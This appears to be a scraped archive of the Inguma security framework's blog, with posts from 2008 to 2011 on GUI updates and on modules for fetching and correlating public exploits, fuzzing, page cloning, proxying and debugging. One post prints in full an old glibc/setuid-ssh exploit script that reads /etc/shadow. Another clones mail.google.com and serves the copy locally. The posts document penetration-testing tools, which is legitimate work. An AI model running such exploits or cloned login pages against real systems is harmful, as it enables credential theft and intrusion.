</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2lgo_RlhZIisyDG_JiKmmaDoiDCQeLrDxOI8ChdfiLHr2JQuZhysV9JqQyPoeVaSvZYolEHa_el9rVOiQEGlojOcrGxNcwemG2wID7l-Jlb6QsjayOqUlzThHnlvfApsO2wGYp8CGUgnb/s1600/Autosave.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2lgo_RlhZIisyDG_JiKmmaDoiDCQeLrDxOI8ChdfiLHr2JQuZhysV9JqQyPoeVaSvZYolEHa_el9rVOiQEGlojOcrGxNcwemG2wID7l-Jlb6QsjayOqUlzThHnlvfApsO2wGYp8CGUgnb/s320/Autosave.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576242794989858658" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 159px; " /></a></div><ul><li>We have added autofill on targetDialog so you don't have to manually fill the module target, it will be filled automatically with the IP address of the node.</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVwCAicGaibdC6P_9jr6zKHJwl42Q8xhsSKgKm8R1HgtgTcfwqGmkrsiLNqzIbLyyNjlPzoiowjsY6Q-ZipcJml84w7MMUW5ze0SBtO977bPdiH5TmO5Uvr4dNWpYnMkFrL6sGpEBcDC-E/s1600/Autofill.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVwCAicGaibdC6P_9jr6zKHJwl42Q8xhsSKgKm8R1HgtgTcfwqGmkrsiLNqzIbLyyNjlPzoiowjsY6Q-ZipcJml84w7MMUW5ze0SBtO977bPdiH5TmO5Uvr4dNWpYnMkFrL6sGpEBcDC-E/s320/Autofill.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576243141100143154" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 155px; " /></a></div><ul><li>Added tooltips to confusing parameters of the gather dialog with a little description of the available options.</li>
</ul><ul><li>Added picture support on graphs. Actually it shows OS icon when possible or a generic icon when OS is uknown.</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmezeqeGgojIayWSWGr9vNGeWVkxBaTmSHXS2bmvX2-dOxTjySv4wB5ZqD68mLE0ykG-uv_6aGdrUz3Lmbv6ehYH2zJOGzlFuC1pB-DNLVo6RETGT_21MDLaFKdm_oYTKommzStB-aZOvq/s1600/OS_Icons.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmezeqeGgojIayWSWGr9vNGeWVkxBaTmSHXS2bmvX2-dOxTjySv4wB5ZqD68mLE0ykG-uv_6aGdrUz3Lmbv6ehYH2zJOGzlFuC1pB-DNLVo6RETGT_21MDLaFKdm_oYTKommzStB-aZOvq/s320/OS_Icons.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576243335800037554" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 113px; " /></a></div><ul><li>Right click on web vuln (OSVDB) at Vulns per port graph opens vulnerability info on browser.</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkWKM8f93wk6rFKlglFzwsEP0LLtPd-k_lsQrc5h0HIbx_LoztmRdAtNyuRKNChwo979siqZRzD9bzsu8gBPyk3nzoZlT2YtVPsAkpZVIRbzxhMflBl_7DkLSkkQ5odnu3X9xQ5zTR1XWk/s1600/web_vuln.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkWKM8f93wk6rFKlglFzwsEP0LLtPd-k_lsQrc5h0HIbx_LoztmRdAtNyuRKNChwo979siqZRzD9bzsu8gBPyk3nzoZlT2YtVPsAkpZVIRbzxhMflBl_7DkLSkkQ5odnu3X9xQ5zTR1XWk/s320/web_vuln.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576249704445693090" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 170px; " /></a></div><ul><li>Added more dependency checks (graphviz, Impacket, PySNMP) to help identify and manage start up problems.</li>
</ul><div><div><span class="Apple-style-span">Checking:</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>GTK UI dependencies... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span">WARNING: No route found for IPv6 destination :: (no default route?)</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>Scapy... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>Network connectivity... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>GtkSourceView2... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>VTE Terminal... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>Impacket library... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>PySNMP library... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div><div><span class="Apple-style-span"><span class="Apple-tab-span" style="white-space:pre"> </span>Graphviz binaries... <span class="Apple-tab-span" style="white-space:pre"> </span>OK</span></div></div><div><ul><li><b>Improved performance</b> of TCP, UCP and ICMP ping modules and "portscan" module (SYN and ACK). So now add target dialog has improved a lot the speed by using "portscan" instead of "tcpscan" and is more complete by <b>using "identify" on opened ports</b>.</li>
</ul><ul><li>Half of the users told us that they wanted module output on new dialogs and the other half prefered to have it on the "Logs" tab at the bottom. So finally we changed module output behavior using SHOW_MODULE_WIN at config.py. If set to true it will popup module ouput on a new dialog but if set to False it will drop it to the Logs Tab.</li>
</ul><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSTf-LPMQMPJet7jtC2fQH-hPi9rmfLaqzRzaoSy7vIocqZSWR_FckdV_TXeaYKRDQjegloiGoiW1S4MA1DbJkNXighXzRPSocZtlShToPpWGCvJHJPVW2jrcLKoM5ciXSaUmCcrC0scr/s1600/output.png"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCSTf-LPMQMPJet7jtC2fQH-hPi9rmfLaqzRzaoSy7vIocqZSWR_FckdV_TXeaYKRDQjegloiGoiW1S4MA1DbJkNXighXzRPSocZtlShToPpWGCvJHJPVW2jrcLKoM5ciXSaUmCcrC0scr/s320/output.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5576246067315386242" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 320px; height: 202px; " /></a></div></div><div><br />
</div></div><div>For more info<span><span>rmation do not hesitate to contact the team using any of the options listed on this wiki <a href="http://inguma.eu/projects/inguma/wiki/Contact">page</a>.</span></span><span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 24px; "><span><span><span><span></span></span></span></span><span class="hps" title="Click for alternate translations"></span></span></div>Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-17841093305559597662011-01-16T23:05:00.003+01:002011-09-04T05:15:16.720+02:00We are back!<div>It's been a long time since our last post and most of the people thought that Inguma was dead, but we are back and we have some news for you. Let's see what has changed since our last post.</div><div>
<br /></div><div>Today we launch a <a href="http://code.google.com/p/inguma/">new site</a> for the project hosted on Google Code. Almost all the documentation has been moved from the old site and many more has been added. There are still lots to be added but there is enough to get started using the software.</div><div>
<br /></div><div>Of course many bugs have been fixed, some new modules added and even a few have been removed but the most exciting feature we have added to this release is a fancy new GUI.</div><div>
<br /></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMS8qR4kso2DBdF8MGRolO6OBLxJ460_5gn48VJpYCuOwJTSjfNoZmblbL3m2u9VMG84qnA9kHFyarYeqOflJGBu7fn-KSi9YpZfsg4YcksNWT-k9VAl85SyWY-86ipVKw0BG1hyphenhyphenPs4q6_/s1600/Step-9.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 187px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMS8qR4kso2DBdF8MGRolO6OBLxJ460_5gn48VJpYCuOwJTSjfNoZmblbL3m2u9VMG84qnA9kHFyarYeqOflJGBu7fn-KSi9YpZfsg4YcksNWT-k9VAl85SyWY-86ipVKw0BG1hyphenhyphenPs4q6_/s320/Step-9.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5562914971554594674" /></a>
<br /><div>The old Qt GUI has been removed and the new one is PyGtk based, of course the good command line one is still there. <b>This new GUI can't be considered yet stable</b> and not all the modules are actually working properly on it but it's stable enough to be released and to perform most of the basic functionalities.</div><div>
<br /></div><div>If the command line one is like a toolbox with high scripting capabilities, the GUI is an attempt to integrate all those tools into a common workflow and add many data visualization aids. The main command line interface should work on the same platforms that before (Linux, Windows and MacOS) but the GUI isn't ready neither tested on other platform that Linux.</div><div>
<br /></div><div>Instead of writing here all the new features or a deep description of the new GUI you can go directly to the <a href="http://code.google.com/p/inguma/wiki/ConsoleQuickStart">Console</a> or <a href="http://code.google.com/p/inguma/wiki/PyGtkQuickStart">GUI quick</a> start guides and read about them. The code can be downloaded packed in a tar.gz or from the mercurial repository if you prefer to have your code up to date with all the new features that we will keep adding.</div><div>
<br /></div><div>That's all for the moment; thanks to all the people that has supported me during this time and I hope you enjoy using and, hopefully, improving this new release.</div>Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com3tag:blogger.com,1999:blog-8320914018667085850.post-75784243306136468912009-01-15T22:20:00.001+01:002011-08-15T05:14:18.728+02:00Exploits for all!It's been a while since my last post, as always ;), and today we are going to see a new module that almost every Inguma's user has been waiting.<br />
<br />
Actually the Inguma's development team is just two persons and the project is still young and lacks many features but one of them is even more necessary: exploits. Inguma itself requires lots of development so we can't spent much more time developing exploits but with this module I will try to solve this problem a little.<br />
<br />
The new module, called 'localxpl' (local exploits), will allow Inguma to download and manage exploits from two important exploits repositories: <a href="http://www.milw0rm.com/">Milw0rm</a> an <a href="http://www.packetstormsecurity.org/">Packetstorm</a>. Let's see it in action in order to see what and how can do this new module. The new module can be found under the category 'exploits' and once you type 'localxpl' you will enter into it's interface:<br />
<pre>inguma> show exploits
List of exploit modules
-----------------------
(...)
localxpl A Module to fetch and manage exploits from many sources
(...)
inguma> localxpl
Exploits from Milw0rm not yet downloaded
Exploits from Packetstorm not yet downloaded
Actual remotedb selected: milw0rm
LOCXPL>
</pre><br />
We can see that it informs us that we haven't downloaded any exploit yet and that, by default, the repository to work with is milw0rm. To see the options we have just to type 'help':<br />
<pre>LOCXPL> help
Inguma's Local Exploit DDBB Help
--------------------------------
remotedb Database to work with: milw0rm or packetstorm
fetch Download exploits from remotedb
help Show this help
exit Exits the DDBB
</pre><br />
As we have no local repository yet, the options shown are just a few: select the repository to get (milw0rm or packetstorm) and download the exploits from the selected repository. As we have no other choice with milw0rm selected, let's download the exploits with the command 'fetch' and see the new options:<br />
<pre>LOCXPL> fetch
Dir: /inguma/modules/exploits/
Downloading http://www.milw0rm.com/sploits/milw0rm.tar.bz2
Extracting files...
Exploits successfully downloaded on Thu Jan 15 20:19:38 2009
Operation Complete
</pre><br />
Now we know that exploits are going to be stored under directory exploits and that the download finished fine; the path to store the exploits can be modified easily on the source of the module. Type 'help' again to see the new options:<br />
<pre>Inguma's Local Exploit DDBB Help
--------------------------------
remotedb Database to work with: milw0rm or packetstorm
fetch Download exploits from remotedb
Manage Milw0rm DDBB commands
----------------------------
list Shows list of local exploits. VERY VERBOSE
search Search exploits; use the 'tag' variable
Example: to search for windows exploits
'tag Windows'
rport Shows exploits afecting a remote port
Define the port using command 'port 22'
Port must be numeric: 22 intead of SSH
correlate Searches the DDBB for all exploits matching rport
for all the ports of a scaned machine. Specify
target machine with 'target 192.168.0.1'
Be sure to scan the machine before!
show Shows selected exploit source code
Select exploit using xplpath command:
'xplpath path/to/exploit'
help Show this help
exit Exits the DDBB
</pre><br />
Now that we have some exploits downloaded we have some more operations to perform with them. For example we can list all the exploits downloaded from milw0rm just by typing 'list' but this will output lots of them so... Also we can now search all the exploits for a given keywords just by setting it with the commands 'tag' and 'search':<br />
<pre>LOCXPL> tag openssh
New search tag: openssh
LOCXPL> search
Searching milw0rm local DDBB for tag: openssh
./platforms/linux/local/258.sh glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x
</pre><br />
We got one match for an exploit related to 'OpenSSH' and now we can get more information just by displaying its contents; just set the path to th exploit using the command 'xplpath' and the path you got from the search results and type show:<br />
<pre>LOCXPL> xplpath ./modules/exploits/milw0rm/platforms/linux/local/258.sh
./modules/exploits/milw0rm/platforms/linux/local/258.sh set to show.
LOCXPL> show
# Charles Stevenson <csteven@newhope.terraplex.com>
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****krochos@linuxmail.org****)
# Edit this if you have a problem with path
ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow # File to read
###############################################################################
echo "$ssh"
echo "[*] Checking permisions..."
if [ ! -u $ssh ]; then
echo "$ssh is NOT setuid on this system or does not exist at all!"
if [ ! -u $traceroute ]; then
echo "$traceroute is NOT setuid on this system or does not exist at all!"
exit 0
fi
fi
export RESOLV_HOST_CONF=$FILE
echo "[*] Glibc bug found by Charles Stevenson <csteven@newhope.terraplex.com>"
echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# milw0rm.com [2001-01-25]
</csteven@newhope.terraplex.com></csteven@newhope.terraplex.com></pre><br />
Another option is to list all the exploits affecting a given remote port using the command 'rport' after specifying the remote port with the command 'port' as explained in the help; the command 'correlate' will be shown late on this post.<br />
<br />
Now that we have seen what we can do with the Milw0rm repository let's see what can we do with Packetstorm; first we switch to packetstorm with the command 'remotedb' and type help:<br />
<pre>LOCXPL> remotedb packetstorm
New remotedb selected: packetstorm
LOCXPL> help
Inguma's Local Exploit DDBB Help
--------------------------------
remotedb Database to work with: milw0rm or packetstorm
fetch Download exploits from remotedb
years A space separated list of years to fetch
Example: 'years 06 07 08'
help Show this help
exit Exits the DDBB
</pre><br />
As with milw0rm, until we get the exploits we have few choices. But now we have one difference, packetstorm classify it's exploits by year so we can specify the years we want to fetch with the command 'years'; by default exploits from the years 2007/08 will be downloaded.<br />
<pre>LOCXPL> years 08
Years: ['08']
LOCXPL> fetch
Dir: /inguma/modules/exploits/packetstorm/
Start: 2008
Downloading: http://packetstormsecurity.org/0812-exploits/2008-exploits.tgz ...
Done. Extracting files...
Done: 2008
Exploits successfully downloaded on Thu Jan 15 20:28:44 2009
</pre><br />
Almost the same as with milw0rm till now. From now on if we fetch exploits from milw0rm or packetstorm they will be updated, and if we specify 'years 07 08' and fetch again only the exploits of year 2007 will be downloaded. So let's see the new options we have now for the packetstorm repository:<br />
<pre>Inguma's Local Exploit DDBB Help
--------------------------------
remotedb Database to work with: milw0rm or packetstorm
fetch Download exploits from remotedb
years A space separated list of years to fetch
Example: 'years 06 07 08'
Manage Packetstorm DDBB commands
--------------------------------
list Shows list of local exploits. VERY VERBOSE
Also navigate the exploits listing going with
your browser to, for example:
/inguma/modules/exploits/packetstorm/08-exploits/0801-exploits/index.html
search Search exploits; use the 'tag' variable
Example: to search for windows exploits
Example: 'tag Windows Vista'
Optionaly append a year to search only on exploits of this year
Example: 'year 08'
show Shows selected exploit source code
Select exploit using xplpath command:
'xplpath path/to/exploit'
help Show this help
exit Exits the DDBB
</pre><br />
As we can see options are almost the same that we have with milw0rm but here we can't search by port; if look at the help of the command list we can see that we can browse the exploits of this repository by opening the file index.html that exists on each directory of the repository, just change year and month on the path.<br />
<br />
And the last command we are going to see is the 'correlate' that we can find in the milw0rm help. With this command we can automatically search all the exploits that may affect all the ports that have been reported open by the port scans. So, the first thing we need to perform is a port scan:<br />
<pre>inguma> target = '192.168.0.1'
inguma> tcpscan
Scanning port 17004 (417/417)
Open ports
----------
Port 1720 is open
Port 23/telnet is open
</pre><br />
Once we get the open ports for this target we enter into the 'localxpl' interface to correlate the results with the existing exploits. As we already have downloaded the exploits we are now informed with the dates of the downloads so we can decide if we need to update.<br />
<pre>inguma> localxpl
Last Milw0rm DDBB update: Thu Jan 15 20:19:38 2009
Last Packetstorm DDBB update: Thu Jan 15 20:28:44 2009
Actual remotedb selected: milw0rm
</pre><br />
Now we just need to specify the target we have scanned and we want to correlate and launch the command 'correlate':<br />
<pre>LOCXPL> target 192.168.0.1
Target set for correlation: 192.168.0.1
LOCXPL> correlate
Searching exploits available on milw0rm DDBB for port TCP/23
/inguma/modules/exploits/milw0rm/rport/23/346.c
/inguma/modules/exploits/milw0rm/rport/23/3293.sh
/inguma/modules/exploits/milw0rm/rport/23/254.c
/inguma/modules/exploits/milw0rm/rport/23/621.c
/inguma/modules/exploits/milw0rm/rport/23/89.c
/inguma/modules/exploits/milw0rm/rport/23/409.c
Searching exploits available on milw0rm DDBB for port TCP/1720
No exploits found for port TCP/1720
</pre><br />
Ok, this is not enough to get accurate results but it's a starting point so, once I improve the scanning modules, to get and store also information about the services listening on each port that's all we have.<br />
<br />
So that's all folks; I hope that I will improve this module soon and also get new interesting ones. To finish, a tip for my next module: PIG. ;)Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com1tag:blogger.com,1999:blog-8320914018667085850.post-82860300023010941322008-12-27T17:49:00.002+01:002011-08-15T05:15:29.775+02:00After a long while...Hi!<br />
<br />
After a long while Hugo & I decided to prepare the new Inguma version (Release 0.1.0) with some new features. There are new modules in the new version, as the ASNQuery module or the NMap fronted both created by Hugo, and new features & tools.<br />
<br />
The 2 most interesting new tools added to the framework are, for sure, the PCAP-based fuzzer and the OpenDis Binary Navigator.<br />
<br />
The PCAP based fuzzer works this way: Record with your favourite sniffer a session communicating with your target server application, save the recorded session as one PCAP file and create a new PCAP based fuzzer as the following:<br />
<br />
<pre>-----------------------------------------------------------------------------------
import sys
from scapy import *
from fuzzpcap import *
from lib import libfuzz
def main(pcapFile, dest, destPort):
replayList = []
pktList = rdpcap(pcapFile)
for pkt in pktList:
tcpPkt = pkt[TCP]
flags = tcpPkt.sprintf("%flags%")
dst = pkt.sprintf("%IP.dst%")
dstPort = tcpPkt.sprintf("%TCP.dport%")
if flags == "PA" and dst == dest and dstPort == destPort:
# Get the packet's data
pktBuf = str(tcpPkt[Raw])
replayList.append(pktBuf)
replayer = CReplayFuzzer(dest, destPort, replayList)
replayer.verbose = False # Show every packet that will be sent?
replayer.timeout = 0.3 # Time to wait for a response?
replayer.waitResponse = True # Wait for a response?
replayer.startPacket = 0 # Start from packet number 0
replayer.dontWaitFor = xrange(0, 1024) # Don't wait for a response for these packets
replayer.fuzz() # Start fuzzing now!
-----------------------------------------------------------------------------------
</pre><br />
<span style="font-size:100%;"><br />
That easy. For some (undocumented) protocols this is a fast way to start fuzzing a complete communication session without having any knowledge about the communication protocol.<br />
<br />
Another interesting tool (as previously pointed) is the OpenDis Binary Navigator. It's a frontend for OpenDis databases (the format of the databases changed from cpickle objects to SQLite format databases). With this tool you might upload (this is a webserver, bind it to 127.0.0.1 if you don't want to open this to your network) programs to be analyzed by OpenDis and generate an SQLite based database. This database can be navigated using the OpenDis Binary Navigator.<br />
<br />
The most curious features of OpenDis Binary Navigator right now are the ability to generate basic block diagrams (you need Graphviz) and the option to calculate the CC (Cyclomatic Complexity) of a procedure. You might see screenshots at the end of this post.<br />
<br />
Well, that's all at the moment. I will try to upload the new version of Inguma to sourceforge before the end of the year. Happy XMas and happy new year!<br />
</span><br />
<span><br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRFyXWwQWt1Lyebt6-DSr3GloGivJfZvp5fZ6Za8L8qV3sW8A7Jy5OGcNm5gjQFhHig6ree-_GS8QLqzQu-6wqxXYD4VUrrGgsD_SKJ1fo9ELiuAZS2d39q8_2zPzKoqXw4mY-Cwgin7Xm/s1600-h/example1.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRFyXWwQWt1Lyebt6-DSr3GloGivJfZvp5fZ6Za8L8qV3sW8A7Jy5OGcNm5gjQFhHig6ree-_GS8QLqzQu-6wqxXYD4VUrrGgsD_SKJ1fo9ELiuAZS2d39q8_2zPzKoqXw4mY-Cwgin7Xm/s320/example1.jpg" alt="" id="BLOGGER_PHOTO_ID_5284520472019434434" border="0" /></a><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivp9193rOdyLfxjlc8ATgMXM9kHiEfYUUluV1TFUfOF-aszUU9aLiL0J8ssTy_wLfY03DO4lJXYPqY1yw7G-bOKDUnuvV3PiCucD9XKI7dpiFAPnqD_pWij-cPSr1fwhEK9SBW62W3WX6M/s1600-h/example3.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 134px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivp9193rOdyLfxjlc8ATgMXM9kHiEfYUUluV1TFUfOF-aszUU9aLiL0J8ssTy_wLfY03DO4lJXYPqY1yw7G-bOKDUnuvV3PiCucD9XKI7dpiFAPnqD_pWij-cPSr1fwhEK9SBW62W3WX6M/s320/example3.jpg" alt="" id="BLOGGER_PHOTO_ID_5284519654483802194" border="0" /></a><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijDe8oedKGLs3IpXVbr9SERWIDKFWMcLr7GJdW5hjjCQ5P6kCzmJssCX39F6nEm1bf2-J3dwOyco0tJYFoFbog8rRz3eMq-7MC-oS8EQ73gO7McTHWcIxFPbETEhi4JazDx51cY4Ix8ogO/s1600-h/example2.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 270px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijDe8oedKGLs3IpXVbr9SERWIDKFWMcLr7GJdW5hjjCQ5P6kCzmJssCX39F6nEm1bf2-J3dwOyco0tJYFoFbog8rRz3eMq-7MC-oS8EQ73gO7McTHWcIxFPbETEhi4JazDx51cY4Ix8ogO/s320/example2.jpg" alt="" id="BLOGGER_PHOTO_ID_5284519644931536674" border="0" /></a><br />
</span>Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-15358411285532931772008-09-09T23:37:00.001+02:002011-08-15T05:13:10.174+02:00More toys for IngumaHi all,<br />
<br />
Last days we have keep working on more modules for Inguma, so let's see the result of this work.<br />
<br />
First we have two new modules that could be very useful when used together with the DnsSpoof; both modules are located under the Gather category and are a TCP proxy and a Web Server with some basic crawling capabilities.<br />
<pre>inguma> info webserver
crawl = <True/False>
target = <target URL to crawl if True>
port = <server port>
inguma> info tcpproxy
target = <target host or network>
port = <target port>
newport = <new target port>
inguma>
</pre><br />
The web server will crawl a web page, if crawl variable is set to 'True', and after that will start serving that page at the specified port.<br />
<pre>inguma> info webserver
crawl = <True/False>
target = <target URL to crawl if True>
port = <server port>
inguma> crawl = True
inguma> target = 'http://mail.google.com'
inguma> port = 80
inguma> webserver
Crawl True
Crawling page: http://mail.google.com
Parsing image links...
Parsing href links...
Crawled page saved at /home/hteso/Proyectos/inguma-dev/data/web/index.html
serving at port 80
localhost - - [09/Sep/2008 23:08:17] "GET / HTTP/1.1" 200 -
localhost - - [09/Sep/2008 23:08:17] "GET /favicon.ico HTTP/1.1" 404 -
</pre><br />
This can be funny ;) <br />
<br />
On the other hand we have the TCP Proxy...<br />
<pre>inguma> info tcpproxy
target = <target host or network>
port = <target port>
newport = <new target port>
inguma> target = 'http://www.google.es'
inguma> port = 80
inguma> newport = 80
inguma> tcpproxy
Starting TCP proxy
Redirecting: localhost:80 -> http://mail.google.com:80
inguma> Creating new session for 127.0.0.1 55231
Creating new pipe thread <PipeThread(Thread-2, initial)> ( ('127.0.0.1', 55231) -> ('74.125.39.104', 80) )
1 pipes active
Creating new pipe thread <PipeThread(Thread-3, initial)> ( ('74.125.39.104', 80) -> ('127.0.0.1', 55231) )
2 pipes active
0010 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D meta http-equiv=
0020 22 63 6F 6E 74 65 6E 74 2D 74 79 70 65 22 20 63 "content-type" c
0030 6F 6E 74 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D ontent="text/htm
0040 6C 3B 63 68 61 72 73 65 74 3D 75 74 66 2D 38 22 l;charset=utf-8"
0080 79 20 7B 66 6F 6E 74 2D 66 61 6D 69 6C 79 3A 20 y {font-family:
0090 61 72 69 61 6C 2C 73 61 6E 73 2D 73 65 72 69 66 arial,sans-serif
...
</pre><br />
One of the next improvements for this module will be the ability to trap and modify requests and answers.<br />
<br />
Finally we have added a new section called RCE that will group all the tools for working with binaries:<br />
<pre>inguma> show rce
List of rce modules
-------------------
debugger Userland Debugger
hexdump A simple HexDump utility
The first tool is a simple Hexdump utility.
inguma> info hexdump
target = < Target file >
lines = <lines per page of dump>
inguma> target = '/bin/cat'
inguma> hexdump
/bin/cat
--------------------------------------------------------------------------
000000: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 | ELF............
000010: 02 00 03 00 01 00 00 00 c0 8c 04 08 34 00 00 00 | ........�...4...
000020: 78 66 00 00 00 00 00 00 34 00 20 00 07 00 28 00 | xf......4. ...(.
000030: 1b 00 1a 00 06 00 00 00 34 00 00 00 34 80 04 08 | ........4...4...
000040: 34 80 04 08 e0 00 00 00 e0 00 00 00 05 00 00 00 | 4...�...�.......
000050: 04 00 00 00 03 00 00 00 14 01 00 00 14 81 04 08 | ................
000060: 14 81 04 08 13 00 00 00 13 00 00 00 04 00 00 00 | ................
000070: 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 | ................
000080: 00 80 04 08 c0 63 00 00 c0 63 00 00 05 00 00 00 | ....�c..�c......
000090: 00 10 00 00 01 00 00 00 c0 63 00 00 c0 f3 04 08 | ........�c..�
0000a0: c0 f3 04 08 dc 01 00 00 64 03 00 00 06 00 00 00 | ��..�...d.......
0000b0: 00 10 00 00 02 00 00 00 d4 63 00 00 d4 f3 04 08 | ........�c..�
0000c0: d4 f3 04 08 d0 00 00 00 d0 00 00 00 06 00 00 00 | ��..�...�.......
0000d0: 04 00 00 00 04 00 00 00 28 01 00 00 28 81 04 08 | ........(...(...
0000e0: 28 81 04 08 20 00 00 00 20 00 00 00 04 00 00 00 | (... ... .......
0000f0: 04 00 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 | ....Q�td........
000100: 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 | ................
000110: 04 00 00 00 2f 6c 69 62 2f 6c 64 2d 6c 69 6e 75 | ..../lib/ld-linu
000120: 78 2e 73 6f 2e 32 00 00 04 00 00 00 10 00 00 00 | x.so.2..........
--------------------------------------------------------------------------
jump to...
</pre><br />
And the last tool that we will review today is a ring 3 debugger coded in python and that you can find in <a href="http://www.kenshoto.com/vtrace/">this</a> web site.<br />
<pre>inguma> debugger
Loading VDB Modules:
... Complete
vdb > help
Documented commands (type help <topic>):
========================================
alias bpedit config fds maps mode regs snapshot threads
attach break detach go mem ps script stepi vstruct
bestname bt dis ignore memdump python server struct writemem
bp call exec lm meta quit signal syms
Undocumented commands:
======================
EOF help sections
vdb > ps
[Pid] [ Name ]
1 /sbin/init
2764 /sbin/udevd --daemon
4458 /sbin/portmap
4482 /sbin/rpc.statd
4611 /sbin/getty 38400 tty4
4612 /sbin/getty 38400 tty5
4614 /sbin/getty 38400 tty2
4617 /sbin/getty 38400 tty3
4618 /sbin/getty 38400 tty6
4813 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
...
</pre><br />
Actually the module just starts the debugger (either in console or graphical mode) but we are working on a more deep integration of the tool with Inguma and, may be, a programmatic RCE environment with the debugger, OpenDis, ...<br />
<br />
That's all for the moment, stay tuned!!<br />
<br />
Hugo TesoInguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com1tag:blogger.com,1999:blog-8320914018667085850.post-51570546905320354862008-08-31T19:05:00.002+02:002011-08-15T05:12:33.525+02:00New libraries in the Inguma FrameworkHi!<br />
<br />
The, currently in development, new version of Inguma will include modules for Informix and IBM DB2 databases. Right now, for <a href="http://www.ibm.com/db2">IBM DB2</a> databases we don't have many things, just a discover module (at the moment) but I'm working in a Python module for the <a href="http://en.wikipedia.org/wiki/DRDA">DRDA protocol</a>.<br />
<br />
Also, and it's almost finished, I'm working in a pure Python <a href="http://www.ibm.com/software/data/informix/">Informix</a> library. This library just "works". It generates valid packets for login, queries and various other Informix commands (such as DBList, etc...). It wasn't a hard job! I will explain a bit how the Informix communication protocol works: <br />
<br />
The 1st packet the client sends to the database server is a pure ASCII packet with the following format: <br />
